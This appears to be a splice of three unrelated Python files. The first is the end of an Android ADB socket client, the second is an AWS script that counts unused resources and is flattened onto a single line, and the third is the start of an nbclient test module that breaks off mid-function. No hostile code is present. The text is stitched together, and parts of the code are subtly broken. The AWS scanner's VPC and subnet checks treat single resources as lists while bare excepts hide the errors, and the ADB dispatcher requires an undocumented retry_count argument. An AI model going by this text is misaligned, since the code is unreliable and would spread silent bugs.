        self._sock = None

    def poll(self):
        '''None while the worker thread is alive, 0 once it has exited
        '''
        if self._thread.is_alive():
            return None
        else:
            return 0

    def terminate(self):
        '''stop the worker thread
        '''
        self._running = False
        time.sleep(1)  # wait for the thread to exit

    def communicate(self):
        '''block until the command completes and return (stdout, stderr)
        '''
        while True:
            if self._event.wait(0.001) or self.poll() == 0:
                if self._running:
                    raise TimeoutError('Execute timeout')
                return self.stdout.read(), self.stderr.read()
            # time.sleep(0.001)


class ADBClient(object):
    '''client for the adb server's smart-socket protocol
    '''

    instance_dict = {}

    def __init__(self, server_addr='127.0.0.1', server_port=5037):
        self._server_addr = server_addr
        self._server_port = server_port
        self._sock = None
        # RLock instead of Lock: call() can re-enter itself on 'device not found'
        # before the outer finally block has released the lock
        self._lock = threading.RLock()

    @staticmethod
    def get_client(host, port=5037):
        '''get an ADBClient instance for the given host
        '''
        return ADBClient(host, port)

    def call(self, cmd, *args, **kwds):
        '''dispatch an adb command to the matching method
        '''
        cmd = cmd.replace('-', '_')
        if cmd == 'forward' and args[1] == '--remove':
            method = getattr(self, 'remove_forward')
            args = list(args)
            args.pop(1)  # remove the --remove flag from the args
        else:
            method = getattr(self, cmd)
        # print(args)
        sync = True
        if 'sync' in kwds:
            sync = kwds.pop('sync')
        if 'timeout' in kwds and cmd not in ('shell', 'install', 'uninstall', 'wait_for_device', 'reboot'):
            kwds.pop('timeout')
        if sync:
            ret = None
            retry_count = kwds.pop('retry_count')
            i = 0
            socket_error_count = 0
            while i < retry_count:
                try:
                    self._lock.acquire()
                    ret = method(*args, **kwds)
                    break
                except socket.error as e:
                    logger.exception(u'Run %s %s error' % (cmd, ' '.join(args)))
                    socket_error_count += 1
                    if socket_error_count <= 10:
                        i -= 1  # socket errors are granted extra retries
                    time.sleep(1)
                except AdbError as e:
                    err_msg = str(e)
                    if 'device not found' in err_msg:
                        return '', 'error: device not found'
                    elif 'cannot bind to socket' in err_msg:
                        return '', err_msg
                    elif 'cannot remove listener' in err_msg:
                        return '', err_msg
                    elif 'device offline' in err_msg:
                        return '', 'error: device offline'
                    elif 'Bad response' in err_msg or 'Device or resource busy' in err_msg or 'closed' in err_msg:
                        # wetest devices sometimes return a "closed" error;
                        # retry in that case
                        logger.exception('Run %s %s %r' % (cmd, ' '.join(args), e))
                    else:
                        raise RuntimeError(u'Run command %s %s failed: %s' % (cmd, ' '.join(args), e))
                    time.sleep(1)
                    if i >= retry_count - 1:
                        raise e
                except RuntimeError as e:
                    logger.exception(u'Run %s %s %r' % (cmd, ' '.join(args), e))
                    if 'device not found' in str(e):
                        self.wait_for_device(args[0], retry_count=1, timeout=300)
                        self._sock = None
                        return self.call(cmd, *args, **kwds)
                finally:
                    i += 1
                    if self._sock is not None:
                        self._sock.close()
                        self._sock = None
                    self._lock.release()
            if ret is None:
                raise TimeoutError(u'Run cmd %s %s failed' % (cmd, ' '.join(args)))
            if isinstance(ret, (six.string_types, six.binary_type)):
                return ret, ''
            else:
                return ret
        else:
            self._transport(args[0])  # async operations must select the device serial first
            if cmd == 'shell':
                self._lock.acquire()
                self._send_command('shell:' + ' '.join(args[1:]))
                pipe = ADBPopen(self._sock)
                self._sock = None
                self._lock.release()
                return pipe

    def _connect(self):
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        for i in range(3):
            try:
                self._sock.connect((self._server_addr, self._server_port))
                return True
            except socket.error:
                pass
        return False

    def _check_status(self):
        '''check the response status
        '''
        stat = self._sock.recv(4)
        if stat == b"OKAY":
            return True
        elif stat == b"FAIL":
            size = int(self._sock.recv(4), 16)
            val = self._sock.recv(size)
            self._sock.close()
            self._sock = None
            raise AdbError(val.decode('utf8'))
        else:
            raise AdbError("Bad response: %r" % (stat,))

    def _send_command(self, cmd):
        # smart-socket requests are prefixed with a 4-digit hex length
        data = "%04x%s" % (len(cmd), cmd)
        if not self._sock:
            self._connect()
        # logger.debug('send: %r' % data)
        self._sock.send(data.encode('utf8'))
        return self._check_status()

    def _recv(self, size=None):
        '''read data from the socket
        '''
        result = b''
        if size is not None:
            while len(result) < size:
                result += self._sock.recv(size - len(result))
        else:
            data = self._sock.recv(4096)
            while data:
                result += data
                data = self._sock.recv(4096)
        return result

    def send_command(self, cmd):
        self._send_command(cmd)
        size = int(self._sock.recv(4), 16)
        resp = self._sock.recv(size)
        # logger.debug('recv: %r' % resp[:200])
        self._sock.close()
        self._sock = None
        return resp.decode('utf8')

    def _transport(self, device_id):
        self._send_command('host:transport:%s' % device_id)

    def devices(self):
        '''adb devices
        '''
        result = self.send_command('host:devices')
        return result

    def shell(self, device_id, cmd, **kwds):
        '''adb shell
        '''
        cmd_line = 'shell:%s' % cmd
        self._transport(device_id)
        self._send_command(cmd_line)
        result = ADBPopen(self._sock, timeout=kwds['timeout']).communicate()
        self._sock = None
        return result

    def _sync_read_mode(self, remote_path):
        '''query mode/size/mtime of a remote path via the sync protocol
        '''
        remote_path = utf8_encode(remote_path)
        data = b'STAT' + struct.pack(b'I', len(remote_path)) + remote_path
        self._sock.send(data)
        result = self._sock.recv(16)
        if result[:4] != b'STAT':
            raise AdbError('sync_read_mode error')
        mode, size, mtime = struct.unpack(b'III', result[4:])  # was `time`, which shadowed the time module
        return mode, size, mtime

    def pull(self, device_id, src_file, dst_file):
        '''adb pull
        '''
        time0 = time.time()
        self._transport(device_id)
        self._send_command('sync:')
        mode, fsize, ftime = self._sync_read_mode(src_file)
        if mode == 0:
            self._sock.close()
            self._sock = None
            raise AdbError('remote object %r does not exist' % src_file)
        src_file = utf8_encode(src_file)
        data = b'RECV' + struct.pack(b'I', len(src_file)) + src_file
        self._sock.send(data)
        f = open(dst_file, 'wb')
        data_size = 0
        last_data = b''
        while True:
            result = self._sock.recv(8)
            if len(result) != 8:
                logger.warning('Unexpected response data: %r' % result)
                last_data += result
                if len(last_data) < 8:
                    continue
                else:
                    result = last_data[:8]
                    last_data = last_data[8:]
            psize = struct.unpack(b'I', result[4:])[0]  # size of each data chunk
            if result[:4] == b'DONE':
                break
            elif result[:4] == b'FAIL':
                raise AdbError(self._sock.recv(psize))
            elif result[:4] != b'DATA':
                raise AdbError('pull_file error')
            result = self._recv(psize - len(last_data))
            result = last_data + result
            if len(result) >= psize:
                last_data = result[psize:]
                result = result[:psize]
            else:
                raise ValueError('Data length mismatch, expected: %d actual: %d' % (psize, len(result)))
            f.write(result)
            data_size += len(result)
        f.close()
        self._sock.send(b'QUIT' + struct.pack(b'I', 0))
        time_cost = time.time() - time0
        self._sock.close()
        self._sock = None
        if data_size > 0:
            return '%d KB/s (%d bytes in %fs)' % (
                int(data_size / 1000 / time_cost) if time_cost > 0 else 65535, data_size, time_cost)
        else:
            return ''

    def push(self, device_id, src_file, dst_file):
        '''adb push
        '''
        time0 = time.time()
        try:
            st = os.stat(src_file)
        except OSError as e:
            if e.errno == 2:
                raise AdbError("cannot stat '%s': No such file or directory" % src_file)
            else:
                raise e
        self._transport(device_id)
        self._send_command('sync:')
        dst_file = utf8_encode(dst_file)
        mode, fsize, ftime = self._sync_read_mode(dst_file)
        s = b'%s,%d' % (dst_file, st.st_mode)
        data = b'SEND' + struct.pack(b'I', len(s)) + s
        self._sock.send(data)
        with open(src_file, 'rb') as fp:
            data = fp.read(SYNC_DATA_MAX)
            data_size = 0
            while data:
                send_data = b'DATA' + struct.pack(b'I', len(data)) + data
                self._sock.send(send_data)
                data_size += len(data)
                data = fp.read(SYNC_DATA_MAX)
        data = b'DONE' + struct.pack(b'I', int(st.st_mtime))
        self._sock.send(data)
        result = self._sock.recv(8)
        if result[:4] == b'OKAY':
            self._sock.close()
            self._sock = None
            time_cost = time.time() - time0
            return '%d KB/s (%d bytes in %fs)' % (
                int(data_size / 1000.0 / time_cost) if time_cost > 0 else 0, data_size, time_cost)
        elif result[:4] == b'FAIL':
            msg_len = struct.unpack(b'I', result[4:])[0]
            error_msg = self._sock.recv(msg_len)
            self._sock.close()
            self._sock = None
            raise AdbError(error_msg)
        else:
            self._sock.close()
            self._sock = None
            raise RuntimeError('Unexpected data: %r' % result)

    def install(self, device_id, apk_path, args='', **kwds):
        '''adb install
        '''
        if not os.path.exists(apk_path):
            raise AdbError("can't find %r to install" % apk_path)
        apk_name = os.path.split(apk_path)[-1]
        dst_path = '/data/local/tmp/%s' % apk_name
        self.push(device_id, apk_path, dst_path)
        cmdline = 'pm install ' + (args + ' ' if args else '') + dst_path
        result = self.shell(device_id, cmdline, **kwds)
        return result[0].decode('utf8')

    def uninstall(self, device_id, package_name, **kwds):
        '''adb uninstall
        '''
        cmd = 'pm uninstall %s' % package_name
        result = self.shell(device_id, cmd, **kwds)
        return result[0].decode('utf8')

    def forward(self, device_id, local, remote):
        '''adb forward
        '''
        self._send_command('host-serial:%s:forward:%s;%s' % (device_id, local, remote))
        self._sock.close()
        self._sock = None
        return ''

    def remove_forward(self, device_id, local):
        '''adb forward --remove
        '''
        self._send_command('host-serial:%s:killforward:%s' % (device_id, local))
        self._sock.close()
        self._sock = None
        return ''

    def create_tunnel(self, device_id, remote_addr):
        '''create a connection tunnel to the server running on the device
        '''
        self._transport(device_id)
        self._sock.settimeout(2)
        try:
            self._send_command(remote_addr)
        except AdbError as e:
            if 'closed' == e.args[0]:
                return ''
            raise
        except socket.timeout as e:
            logger.warning('create_tunnel timeout')
            return ''
        sock = self._sock
        self._sock = None
        return sock

    def get_state(self, device_id):
        '''get device state
        '''
        return self.send_command('host-serial:%s:get-state' % (device_id))

    def connect(self, device_id):
        '''connect to a remote device (adb connect)
        '''
        result = self.send_command('host:connect:%s' % device_id)
        return 'connected to' in result

    def disconnect(self, device_id):
        '''disconnect a device
        '''
        result = self.send_command('host:disconnect:%s' % device_id)
        return 'disconnected' in result

    def reboot(self, device_id, **kwds):
        '''reboot the device
        '''
        self._transport(device_id)
        self._sock.settimeout(kwds['timeout'])
        try:
            self.send_command('reboot:')
        except socket.error as e:
            raise e
        except:
            pass
        return True

    def wait_for_device(self, device_id, **kwds):
        '''wait for the device to come online
        '''
        self._send_command('host-serial:%s:wait-for-any' % (device_id))
        return ADBPopen(self._sock, timeout=kwds['timeout']).communicate()

    def snapshot_screen(self, device_id):
        '''take a screenshot

        return: Image.Image
        '''
        from PIL import Image
        self._transport(device_id)
        self._send_command('framebuffer:')
        fb_desc = self._sock.recv(13 * 4)
        version = struct.unpack_from('I', fb_desc, 0)[0]
        bpp = struct.unpack_from('I', fb_desc, 4)[0]
        size = struct.unpack_from('I', fb_desc, 8)[0]
        width = struct.unpack_from('I', fb_desc, 12)[0]
        height = struct.unpack_from('I', fb_desc, 16)[0]
        red_offset = struct.unpack_from('I', fb_desc, 20)[0]
        red_length = struct.unpack_from('I', fb_desc, 24)[0]  # @UnusedVariable
        blue_offset = struct.unpack_from('I', fb_desc, 28)[0]
        blue_length = struct.unpack_from('I', fb_desc, 32)[0]  # @UnusedVariable
        green_offset = struct.unpack_from('I', fb_desc, 36)[0]
        green_length = struct.unpack_from('I', fb_desc, 40)[0]  # @UnusedVariable
        alpha_offset = struct.unpack_from('I', fb_desc, 44)[0]
        alpha_length = struct.unpack_from('I', fb_desc, 48)[0]
        if version != 1:
            raise AdbError("Unsupported version of framebuffer: %s" % version)
        # detect order
        util_map = {red_offset: 'R', blue_offset: 'B', green_offset: 'G'}
        keys = list(util_map.keys())
        keys.sort()
        raw_mode = ''.join([util_map[it] for it in keys])
        # detect mode
        if alpha_length and alpha_offset:
            mode = 'RGBA'
            if bpp != 32:
                raise AdbError("Unsupported RGBA mode, bpp is %s" % bpp)
            raw_mode += 'A'
        elif alpha_offset:
            mode = 'RGBX'
            if bpp != 32:
                raise AdbError("Unsupported RGBX mode, bpp is %s" % bpp)
            raw_mode += 'X'
        else:
            mode = 'RGB'
            if bpp == 16:
                raw_mode += ';16'
            elif bpp == 24:
                pass
            else:
                raise AdbError("Unsupported RGB mode, bpp is %s" % bpp)
        data = b''
        while len(data) < size:
            data += self._sock.recv(4096)
        self._sock.close()
        self._sock = None
        return Image.frombuffer(mode, (width, height), data, 'raw', raw_mode, 0, 1)


if __name__ == '__main__':
    pass
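A minimal usage sketch for the client above (not part of the original file): it assumes a local adb server is already listening on the default 127.0.0.1:5037, that the module is importable as `adbclient`, and that `emulator-5554` stands in for a real device serial.

# Hypothetical usage sketch, assuming a running adb server on 127.0.0.1:5037
# and a connected device; 'emulator-5554' is a placeholder serial.
from adbclient import ADBClient

client = ADBClient.get_client('127.0.0.1', 5037)
print(client.devices())  # raw response of the 'host:devices' request

# call() dispatches to the method named by cmd; synchronous calls require
# retry_count, and 'shell' also expects a timeout (forwarded to ADBPopen).
stdout, stderr = client.call('shell', 'emulator-5554', 'getprop ro.build.version.sdk',
                             retry_count=3, timeout=30)
print(stdout)

Since `shell` returns the `(stdout, stderr)` pair produced by `ADBPopen.communicate()`, both values here are byte strings.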
unused_aws_resources.py
""" SYNOPSIS -------- Get the details of unused resources present across regions in the AWS account DESCRIPTION ----------- This script provides a detailed overview of the number of unused resources present in the AWS account. It provides service-wise details of unused resources lying around in all the regions of the AWS account. PREREQUISITES ------------- - Workstation with Python version 3 and above - AWS python-based SDK: boto3 Installation command: pip3 install boto3 - pandas framework and openpyxl for reporting operations (xlsx file). Installation command(s): - pip3 install pandas - pip3 install openpyxl - User credentials (Access Key Id and Secret Accces Key) of a user having atleast the Security Audit permission and above on the AWS account EXAMPLE ------- This script can be executed on a python compiler (AWS Cloudshell, Powershell, bash, any command line tool with python installed) Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key> OUTPUT ------ - The script will provide a summarized count of all unused resources in the account. - For a detailed view, the user can refer to the .xlsx file that will be generated by the script. """ import json import boto3 import argparse import multiprocessing import csv import os import pandas as pd import sys import glob from urllib.request import urlopen def ebs_volume(function, credentials, unused_resource_count, region_list): print('Scanning EBS Volumes') volume_count = 0 unused_volume_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) volumes = list(ec2.volumes.all()) unused_volumes = set([volume.volume_id for volume in volumes if volume.state == 'available']) for volume_id in unused_volumes: unused_volume_detail.append({'ResourceType':'AWS::EC2::Volume','ResourceId':volume_id,'Region':region}) volume_count+=len(unused_volumes) except: pass if volume_count: unused_volume_detail = json.loads(json.dumps(unused_volume_detail)) f = csv.writer(open("./aws_logs/ebs_volume.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_volume_detail in unused_volume_detail: f.writerow([unused_volume_detail["ResourceType"], unused_volume_detail["ResourceId"], unused_volume_detail["Region"]]) unused_resource_count[function] = volume_count def elastic_ip(function, credentials, unused_resource_count, region_list): print('Scanning Elastic IPs') eip_count = 0 unused_eip_detail = [] for region in region_list: try: ec2_client = boto3.client('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) eip_data = ec2_client.describe_addresses()['Addresses'] for eip in eip_data: try: AssociationId = eip['AssociationId'] except: AssociationId = '' if not AssociationId: unused_eip_detail.append({'ResourceType':'AWS::EC2::EIP','ResourceId':eip['AllocationId'],'Region':region}) eip_count += 1 except: pass if eip_count: unused_eip_detail = json.loads(json.dumps(unused_eip_detail)) f = csv.writer(open("./aws_logs/elastic_ip.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_eip_detail in unused_eip_detail: f.writerow([unused_eip_detail["ResourceType"], unused_eip_detail["ResourceId"], unused_eip_detail["Region"]]) unused_resource_count[function] = eip_count def network_interface(function, credentials, unused_resource_count, region_list): print('Scanning 
Network Interfaces') ni_count = 0 unused_ni_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) network_interfaces = list(ec2.network_interfaces.all()) unused_nis = set([ni.network_interface_id for ni in network_interfaces if ni.status == 'available']) for network_interface_id in unused_nis: unused_ni_detail.append({'ResourceType':'AWS::EC2::NetworkInterface','ResourceId':network_interface_id,'Region':region}) ni_count+=len(unused_nis) except: pass if ni_count: unused_ni_detail = json.loads(json.dumps(unused_ni_detail)) f = csv.writer(open("./aws_logs/network_interface.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_ni_detail in unused_ni_detail: f.writerow([unused_ni_detail["ResourceType"], unused_ni_detail["ResourceId"], unused_ni_detail["Region"]]) unused_resource_count[function] = ni_count def vpc(function, credentials, unused_resource_count, region_list): print('Scanning VPCs') vpc_count = 0 unused_vpc_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) vpcs = list(ec2.vpcs.all()) network_interfaces = list(ec2.network_interfaces.all()) all_vpcs = set([vpc.vpc_id for vpc in vpcs]) all_active_vpcs = set([vpc['VpcId'] for ni in network_interfaces for vpc in ni.vpc]) unused_vpcs = all_vpcs - all_active_vpcs for vpcid in unused_vpcs: unused_vpc_detail.append({'ResourceType':'AWS::EC2::VPC','ResourceId':vpcid,'Region':region}) vpc_count+=len(unused_vpcs) except: pass if vpc_count: unused_vpc_detail = json.loads(json.dumps(unused_vpc_detail)) f = csv.writer(open("./aws_logs/vpc.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_vpc_detail in unused_vpc_detail: f.writerow([unused_vpc_detail["ResourceType"], unused_vpc_detail["ResourceId"], unused_vpc_detail["Region"]]) unused_resource_count[function] = vpc_count def subnet(function, credentials, unused_resource_count, region_list): print('Scanning Subnets') subnet_count = 0 unused_subnet_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) subnets = list(ec2.subnets.all()) network_interfaces = list(ec2.network_interfaces.all()) all_subnets = set([subnet.subnet_id for subnet in subnets]) all_active_subnets = set([subnet['SubnetId'] for ni in network_interfaces for subnet in ni.subnet]) unused_subnets = all_subnets - all_active_subnets for subnetid in unused_subnets: unused_subnet_detail.append({'ResourceType':'AWS::EC2::Subnet','ResourceId':subnetid,'Region':region}) subnet_count+=len(unused_subnets) except: pass if subnet_count: unused_subnet_detail = json.loads(json.dumps(unused_subnet_detail)) f = csv.writer(open("./aws_logs/subnet.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_subnet_detail in unused_subnet_detail: f.writerow([unused_subnet_detail["ResourceType"], unused_subnet_detail["ResourceId"], unused_subnet_detail["Region"]]) unused_resource_count[function] = subnet_count def security_group(function, credentials, unused_resource_count, region_list): print('Scanning Security Groups') sg_count = 0 unused_sg_detail = [] for region in region_list: try: ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], 
aws_secret_access_key=credentials['secret_key'], region_name=region) sgs = list(ec2.security_groups.all()) network_interfaces = list(ec2.network_interfaces.all()) all_sgs = set([sg.group_id for sg in sgs]) all_inst_sgs = set([sg['GroupId'] for ni in network_interfaces for sg in ni.groups]) unused_sgs = all_sgs - all_inst_sgs for sgid in unused_sgs: unused_sg_detail.append({'ResourceType':'AWS::EC2::SecurityGroup','ResourceId':sgid,'Region':region}) sg_count+=len(unused_sgs) except: pass if sg_count: unused_sg_detail = json.loads(json.dumps(unused_sg_detail)) f = csv.writer(open("./aws_logs/security_group.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_sg_detail in unused_sg_detail: f.writerow([unused_sg_detail["ResourceType"], unused_sg_detail["ResourceId"], unused_sg_detail["Region"]]) unused_resource_count[function] = sg_count def classic_loadbalancer(function, credentials, unused_resource_count, region_list): print('Scanning Classic Load balancers') elb_count = 0 unused_elb_detail = [] for region in region_list: try: classic_lb = boto3.client('elb', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) paginated_data=[] elb_paginator = classic_lb.get_paginator('describe_load_balancers') for load_balancers in elb_paginator.paginate(): paginated_data.extend(load_balancers['LoadBalancerDescriptions']) for elb_detail in paginated_data: instance_health_status = [] instance_data = classic_lb.describe_instance_health(LoadBalancerName=elb_detail['LoadBalancerName'])['InstanceStates'] for instance in instance_data: instance_health_status.append(instance['State']) if 'InService' not in instance_health_status: unused_elb_detail.append({'ResourceType':'AWS::ElasticLoadBalancing::LoadBalancer','ResourceId':elb_detail['LoadBalancerName'],'Region':region}) elb_count+=1 except: pass if elb_count: unused_elb_detail = json.loads(json.dumps(unused_elb_detail)) f = csv.writer(open("./aws_logs/classic_loadbalancer.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_elb_detail in unused_elb_detail: f.writerow([unused_elb_detail["ResourceType"], unused_elb_detail["ResourceId"], unused_elb_detail["Region"]]) unused_resource_count[function] = elb_count def app_nw_gateway_loadbalancer(function, credentials, unused_resource_count, region_list): print('Scanning Application/Network/Gateway Load balancers') elbv2_count = 0 unused_elbv2_detail = [] for region in region_list: try: elbv2 = boto3.client('elbv2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region) paginated_data=[] elbv2_paginator = elbv2.get_paginator('describe_load_balancers') for load_balancers in elbv2_paginator.paginate(): paginated_data.extend(load_balancers['LoadBalancers']) for elbv2_detail in paginated_data: target_health_status = [] try: target_group_detail = elbv2.describe_target_groups(LoadBalancerArn=elbv2_detail['LoadBalancerArn'])['TargetGroups'] for target_group in target_group_detail: target_group_health = elbv2.describe_target_health(TargetGroupArn=target_group['TargetGroupArn'])['TargetHealthDescriptions'] for target in target_group_health: target_health_status.append(target['TargetHealth']['State']) except: pass if 'healthy' not in target_health_status: unused_elbv2_detail.append({'ResourceType':'AWS::ElasticLoadBalancingV2::LoadBalancer', 'LoadBalancer_Type':elbv2_detail['Type'], 
'ResourceId':elbv2_detail['LoadBalancerName'],'Region':region}) elbv2_count+=1 except: pass if elbv2_count: unused_elbv2_detail = json.loads(json.dumps(unused_elbv2_detail)) f = csv.writer(open("./aws_logs/app_nw_gateway_loadbalancer.csv", "w", newline='')) f.writerow(["ResourceType", "LoadBalancer_Type", "ResourceId", "Region"]) for unused_elbv2_detail in unused_elbv2_detail: f.writerow([unused_elbv2_detail["ResourceType"], unused_elbv2_detail["LoadBalancer_Type"], unused_elbv2_detail["ResourceId"], unused_elbv2_detail["Region"]]) unused_resource_count[function] = elbv2_count def iam_user(function, credentials, unused_resource_count, region_list): print('Scanning IAM Users') iamuser_count = 0 unused_iamuser_detail = [] try: iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iamuser_data = list(iam.users.all()) for user in iamuser_data: if not user.password_last_used and not iam_client.list_access_keys(UserName=user.name)['AccessKeyMetadata']: unused_iamuser_detail.append({'ResourceType':'AWS::IAM::User', 'ResourceId': user.name, 'Region':'Global'}) iamuser_count += 1 except: pass if iamuser_count: unused_iamuser_detail = json.loads(json.dumps(unused_iamuser_detail)) f = csv.writer(open("./aws_logs/iam_user.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_iamuser_detail in unused_iamuser_detail: f.writerow([unused_iamuser_detail["ResourceType"], unused_iamuser_detail["ResourceId"], unused_iamuser_detail["Region"]]) unused_resource_count[function] = iamuser_count def iam_group(function, credentials, unused_resource_count, region_list): print('Scanning IAM Groups') iamgroup_count = 0 unused_iamgroup_detail = [] try: iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key']) iamgroup_data = list(iam.groups.all()) for group in iamgroup_data: if not iam_client.get_group(GroupName=group.name)['Users']: unused_iamgroup_detail.append({'ResourceType':'AWS::IAM::Group', 'ResourceId': group.name, 'Region':'Global'}) iamgroup_count += 1 except: pass if iamgroup_count: unused_iamgroup_detail = json.loads(json.dumps(unused_iamgroup_detail)) f = csv.writer(open("./aws_logs/iam_group.csv", "w", newline='')) f.writerow(["ResourceType", "ResourceId", "Region"]) for unused_iamgroup_detail in unused_iamgroup_detail: f.writerow([unused_iamgroup_detail["ResourceType"], unused_iamgroup_detail["ResourceId"], unused_iamgroup_detail["Region"]]) unused_resource_count[function] = iamgroup_count def main(arg): access_key = arg.accessKey secret_key = arg.secretKey region_list = [] unused_resource_details = {} try: print("Connecting to AWS account ") session = boto3.session.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key) except: print("\033[1;31;40m ""Please do Check for Credentials provided or Internet Connection and Try Again\n") quit() iam = session.client('sts') account_id = iam.get_caller_identity()["Account"] print("Successfully connected to AWS account", account_id) print("Scanning for unused resources across all available regions.") print("Wait for few minutes...\n") function_list= [ ebs_volume, elastic_ip, network_interface, vpc, subnet, security_group, 
classic_loadbalancer, app_nw_gateway_loadbalancer, iam_user, iam_group ] print("Collecting list of enabled region") available_regions = session.client('ec2',region_name="us-east-1") enabled_regions = available_regions.describe_regions()['Regions'] for region in enabled_regions: region_list.append(region['RegionName']) manager = multiprocessing.Manager() unused_resource_count = manager.dict() credentials = manager.dict() credentials['access_key'] = access_key credentials['secret_key'] = secret_key credentials['account_id'] = account_id jobs = [] try: os.mkdir("./aws_logs") except: pass for function in function_list: try: p = multiprocessing.Process(target=function, args=(function, credentials, unused_resource_count, region_list)) jobs.append(p) p.start() except: print("Exception occurred while creating processes. Please try again later!") quit() if jobs: for process in jobs: try: process.join() except: print("Exception occurred while joining processes. Please try again later!") quit() os.chdir('./aws_logs') writer = pd.ExcelWriter('unused_resources.xlsx') all_files = glob.glob("*.csv") for f in all_files: df = pd.read_csv(f) df.to_excel(writer,sheet_name=f.split('.')[0], index=False) writer.save() for f in all_files: os.remove(f) print("Completed account scan") # Updating Resource Count Object unused_resource_details.update({ 'AWS::EC2::Volume': unused_resource_count[ebs_volume], 'AWS::EC2::EIP': unused_resource_count[elastic_ip], 'AWS::EC2::NetworkInterface': unused_resource_count[network_interface], 'AWS::EC2::VPC': unused_resource_count[vpc], 'AWS::EC2::Subnet': unused_resource_count[subnet], 'AWS::EC2::SecurityGroup': unused_resource_count[security_group], 'AWS::ElasticLoadBalancing::LoadBalancer': unused_resource_count[classic_loadbalancer], 'AWS::ElasticLoadBalancingV2::LoadBalancer': unused_resource_count[app_nw_gateway_loadbalancer], 'AWS::IAM::User': unused_resource_count[iam_user], 'AWS::IAM::Group': unused_resource_count[iam_group] }) # Showing Resource Distribution print("\nUnused Resources in the Account:") unused_resource_count = 0 for key, value in sorted(unused_resource_details.items(), key=lambda x: x[1], reverse=True): if value != 0: print("\t{} : {}".format(key, value)) unused_resource_count+=value print("\n\nSummary:") print("\tTotal Unused Resources:", unused_resource_count) print("\n\nDetailed unused resource information can be found at: aws_logs/unused_resources.xlsx") if(__name__ == '__main__'): arg_parser = argparse.ArgumentParser(prog='unused_aws_resources', usage='%(prog)s [options]', description='Count AWS resources') # Add the arguments arg_parser.add_argument('--accessKey', type=str, required=True, help='AWS Access Key') arg_parser.add_argument('--secretKey', type=str, required=True, help='AWS Secret Key') # Execute the parse_args() method args = arg_parser.parse_args() main(args)
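A small follow-up sketch (an assumption, not part of the script): since the report is written with pandas to aws_logs/unused_resources.xlsx with one sheet per service CSV, it can be read back programmatically the same way.

# Hypothetical post-processing sketch: read the generated report back in.
# Assumes the script above already produced aws_logs/unused_resources.xlsx
# (openpyxl, a stated prerequisite, is needed for xlsx support).
import pandas as pd

sheets = pd.read_excel('aws_logs/unused_resources.xlsx', sheet_name=None)  # {sheet_name: DataFrame}
for service, df in sheets.items():
    print('{}: {} unused resource(s)'.format(service, len(df)))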
test_client.py
import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock

import nbformat
import pytest
import xmltodict
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi
from nbformat import NotebookNode
from testpath import modified_env
from traitlets import TraitError

from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase

addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
current_dir = os.path.dirname(__file__)
ipython_input_pat = re.compile(
    r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))'
)
# Tracebacks look different in IPython 8,
# see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements  # noqa
ipython8_input_pat = re.compile(
    r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))'
)

hook_methods = [
    "on_cell_start",
    "on_cell_execute",
    "on_cell_complete",
    "on_cell_executed",
    "on_cell_error",
    "on_notebook_start",
    "on_notebook_complete",
    "on_notebook_error",
]


def get_executor_with_hooks(nb=None, executor=None, async_hooks=False):
    if async_hooks:
        hooks = {key: AsyncMock() for key in hook_methods}
    else:
        hooks = {key: MagicMock() for key in hook_methods}
    if nb is not None:
        if executor is not None:
            raise RuntimeError("Cannot pass nb and executor at the same time")
        executor = NotebookClient(nb)
    for k, v in hooks.items():
        setattr(executor, k, v)
    return executor, hooks


EXECUTE_REPLY_OK = {
    'parent_header': {'msg_id': 'fake_id'},
    'content': {'status': 'ok', 'execution_count': 1},
}

EXECUTE_REPLY_ERROR = {
    'parent_header': {'msg_id': 'fake_id'},
    'content': {'status': 'error'},
    'msg_type': 'execute_reply',
    'header': {'msg_type': 'execute_reply'},
}


class AsyncMock(Mock):
    pass


def make_async(mock_value):
    async def _():
        return mock_value

    return _()


def normalize_base64(b64_text):
